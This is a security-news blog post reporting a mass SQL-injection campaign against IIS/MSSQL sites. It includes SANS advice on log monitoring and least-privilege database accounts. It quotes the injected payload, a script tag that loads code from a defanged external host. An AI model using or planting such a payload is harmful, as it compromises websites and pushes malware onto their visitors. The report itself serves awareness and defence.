Based on search engine (Mainly Google) quarries also known as dorks a mass SQL-i attack is performing. The output is showing that more than 4,000 websites have been infected in this vulnerability. First when it was detected then the list of infected websites ware small, later it increases. As per report SANS more than thousands sites already been compromised in this attack.
Here is a demo:-
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>
Typically it is inserted into several tables.
From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. Impacted sites appear to be running Microsoft Internet Information Services (IIS) or Microsoft SQL web servers, and are using software from ASP.NET or ColdFusion. Visitors to hacked sites, which are vulnerable because they haven't fully patched their applications and the databases that support them, are being redirected to pages trying to push rogue anti-virus programs or another payload.
"The hex will show in the IIS log files, so monitor those," Hofman wrote. "Make sure that applications only have the access they require, so if the page does not need to update a (database), then use an account that can only read." Later said by SANS handler Mark Hofman
LINK TO OUR HOME PAGE :
Voice Of GREYHAT is a non-profit Organization propagating news specifically related with Cyber security threats, Hacking threads and issues from all over the spectrum. The news provided by us on this site is gathered from various Re-Sources. if any person have some FAQ's in their mind they can Contact Us. Also you can read our Privacy Policy for more info.
Thank You !
-Team VOGH
If you enjoyed VOGH News, Articles Then Do Make sure you to Subscribe Our RSS feed. Stay Tuned with VOGH and get Updated about Cyber Security News, Hacking Threads and Lots More. All our Articles and Updates will directly be sent to Your Inbox. Thank You!
-Team VOGH
Categories:
security-news
,
vulnerablity
